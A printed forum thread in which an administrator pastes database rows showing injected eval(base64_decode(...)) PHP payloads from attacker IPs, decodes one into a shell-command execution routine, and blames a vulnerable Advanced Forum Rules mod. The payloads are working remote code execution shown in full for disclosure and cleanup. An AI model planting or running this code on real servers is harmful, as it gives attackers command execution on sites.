eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die;

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| e783bb5c77bf9a59f9d63d9551a53cd6 | 81.94.196.51 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1297787694 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die;

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| bbc645e5264e506520e938c779d4f23d | 67.192.224.98 | Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4 | 1298619810 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAiQkhMVGVhbTxicj4iOwplY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVjaG8gVW5EZXJHcm91bkQiOwokZXNlZ3VpY21kPWV4KCRjbWQpOwplY2hvICRlc2VndWljbWQ7CmZ1bmN0aW9uIGV4KCRjZmUpewokcmVzID0gJyc7CmlmICghZW1wdHkoJGNmZSkpewppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7CkBleGVjKCRjZmUsJHJlcyk7CiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsKJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsKQG9iX3N0YXJ0KCk7CkBzeXN0ZW0oJGNmZSk7CiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7CkBvYl9lbmRfY2xlYW4oKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsKQG9iX3N0YXJ0KCk7CkBwYXNzdGhydSgkY2ZlKTsKJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsKQG9iX2VuZF9jbGVhbigpOwp9CmVsc2VpZihAaXNfcmVzb3VyY2UoJGYgPSBAcG9wZW4oJGNmZSwiciIpKSl7CiRyZXMgPSAiIjsKd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQpAcGNsb3NlKCRmKTsKfX0KcmV0dXJuICRyZXM7Cn0='));die;

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |

...cont'd in next post due to character limits

| 8c4734033eff728379948bcfb8f45653 | 202.136.168.37 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1299793822 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 9f0427858f5c797717a3aaf69e082c01 | 207.58.131.77 | Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| c1d576eaa0bf6e9b1867413a940cf56a | 207.58.131.77 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| c3f76c51b678d379c20cbbc5580e20ad | 80.38.87.254 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1301251374 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 85fbda11bb0d353a5b4db40ad309b0dc | 88.80.207.132 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b | 1301678740 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| f7b4a57131b4887a2a1eea92376e9697 | 205.204.32.194 | Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320) | 1302083349 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| f8b72c4b4b12138accc7f62c2692ce98 | 183.99.33.109 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1305032315 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"

PHP Code:


		
			
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die();

";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |

One way people make mass chances of that nature is to use a mass defacer script. In part the code I removed from the database did allow for php or shell commands to be executed without placing files into the account.

One occurrence was at: Tue May 10 07:58:35 CDT 2011 by this IP: 183.99.33.109

Code:

  

  echo "v0pCr3w

  ";

  echo "sys:".php_uname()."

  ";

  $cmd="echo nob0dyCr3w";

  $eseguicmd=ex($cmd);

  echo $eseguicmd;

  function ex($cfe){

  $res = '';

  if (!empty($cfe)){

  if(function_exists('exec')){

  @exec($cfe,$res);

  $res = join("\n",$res);

  }

  elseif(function_exists('shell_exec')){

  $res = @shell_exec($cfe);

  }

  elseif(function_exists('system')){

  @ob_start();

  @system($cfe);

  $res = @ob_get_contents();

  @ob_end_clean();

  }

  elseif(function_exists('passthru')){

  @ob_start();

  @passthru($cfe);

  $res = @ob_get_contents();

  @ob_end_clean();

  }

  elseif(@is_resource($f = @popen($cfe,"r"))){

  $res = "";

  while(!@feof($f)) { $res .= @fread($f,1024); }

  @pclose($f);

  }}

  return $res;

  }

Anyone who was using the old version of the Advanced Forum Rules mod, any version, could/was suspect to hackers. There is a fixed update somewhere. Best thing to do is uninstall the mod, remove all files from the server, and re-upload the updated version.

Phrase Groups Available:

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.02323 seconds Memory Usage 2,009KB Queries Executed 10 (?)
More Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (4)bbcode_code_printable (1)bbcode_html_printable (21)bbcode_php_printable (13)bbcode_quote_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)pagenav (1)pagenav_curpage (1)pagenav_pagelink (1)post_thanks_navbar_search (1)printthread (40)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start pagenav_page pagenav_complete bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages: